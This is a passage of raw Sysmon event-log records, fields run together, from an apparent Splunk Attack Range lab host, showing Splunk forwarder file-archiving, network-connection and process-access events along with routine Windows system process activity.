Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035343866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.110{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52607-false10.0.1.12-8000- 23542300x800000000000000035343865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:05.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3A2C8436755A7F32098139FD6EFF296,SHA256=95C199798EF101B8BDEFE9D1FD50A69BD63CEA3D59660FEBFAF189FE3E1F54C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:05.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A6D370BB43B57992B3954D9FF01B075,SHA256=B58E01F8F19CCF61D51DD276CBA56085EF669A26737437DC09B0BFF5A3F11C6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:05.002{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=881D86BF5F607723EA8C8430CFADE6AB,SHA256=D507899C3EB66709F8FA5D7811E0039D41572B8A736AA86216036BC0494BFD1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:06.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDD619FA964DEFAD4F549A4CB26D0EA9,SHA256=ADA7B93366145B8EA15386A5ECF6F588D74BEC95C392B1A83F52B450010A2781,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:07.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6E50C7C36B422A6A3BB98697B7470CE0,SHA256=10EFB943B0874DA8413AC3A0CCCDBF5C615CDC08DBA1465CABADF8D5C3164161,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:07.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3C9B5B441D80519767FA9441F67A6F,SHA256=0BA6625ED5C0D8C1AF12A1EFC7FAE3FDBFD2DC848DFAAB12795AC36EDA2E266B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:33.525{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52608-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:08.048{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC50A4FE39FE5372C5365F406D7E84F,SHA256=CB81CB2D18695CB8CAD379638975652552C730776C94534A0CA7A7CF9EE8EA0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:09.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE7DBE51A9F80F252E0DAC1F352E7BF0,SHA256=3EDC83E27EBF0588A79CC845B39C42A107D905CBE1D1269120C5FC3EE9DE5931,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:10.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD0861E1DE5A41A35CABC8C51BD6973D,SHA256=E977FF7B6AD6C55EFD33E9CF2A356C3349C2BD061F992ACE15266A36BEFE516C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:36.169{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52609-false10.0.1.12-8000- 23542300x800000000000000035343874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:11.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBC442EAB560E5EB3A8D51C2806C52BC,SHA256=18404F7DD2FE38ECD06DAE1F4D57E52770276A0263815785C53F2AF9B3CD3F53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:12.544{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A278D06DCBC983ABCC74D4CE1D82C6F,SHA256=3F6970D559B44315042EA8A470A5A91F791E94BF5626D08C5E947551129E27CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:12.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571CC30B83DFC479A4AF7B5948D9C063,SHA256=B549C680F96CA10BCBDEC2236A6380F68AB76CEC90BF31F8F659B41D48316798,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:38.536{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52610-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:13.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F1FF92ACDD9DF725C52C64D00BD5661,SHA256=F9DEB67748BDB9B8E983C534E23143100EAAB720C3F1A661768E7D1E6CDF6484,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:14.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2B0946CD27D2C8B9340DC71A3E18821,SHA256=777239606C05227F066BC7823AA8279098CABF4BC3C8DD902D38AFBCF241C252,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:15.241{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4CAEFEEE9046E5709D7C3F4B58FFA6A,SHA256=2AC58F6C23F7B59ECFEFC7820F0DA05D61A90BBF645FB8F3C3B28988187A1ECE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:16.243{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=923270EF4B60458394CC0BEDEED33906,SHA256=0BC9B368F0DD1D29E02078B288531FCFB0114AE4565E9DA2A323DA2D4E991D6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:42.163{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52611-false10.0.1.12-8000- 10341000x800000000000000035343892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.511{B81B27B7-74A5-613B-6DB4-03000000C801}67123604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.311{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74A5-613B-6DB4-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.311{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.311{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.311{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.311{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.311{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-74A5-613B-6DB4-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.311{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74A5-613B-6DB4-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.296{B81B27B7-74A5-613B-6DB4-03000000C801}6712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.258{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=219A969B5A89701C0AA823FACA522517,SHA256=64A1D52CA39F289221A8E13576B012E53CB18ECC2CC0EE352A03AD9CA15C24A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0092BFF353E751774F0EAEC81C7ED7D2,SHA256=D11025DAC43B261094793C792BDBE501C89417F73BE1710A4DC9CF963F66E925,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.326{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D890D2888E07745095382448E3045D8C,SHA256=9423D9DA1A7CB727E6A113592DAA37704A366753A8C615F101C05F848F5AD695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.326{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3A2C8436755A7F32098139FD6EFF296,SHA256=95C199798EF101B8BDEFE9D1FD50A69BD63CEA3D59660FEBFAF189FE3E1F54C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.279{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B75EEF83D4C0D00B8B835B0ED720BD9,SHA256=F083F736C0B3E350DD891F244E00E1EDE5D28E654F7A4E3F8AB1549AAF870611,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.010{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74A5-613B-6EB4-03000000C801}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.010{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.010{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.010{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 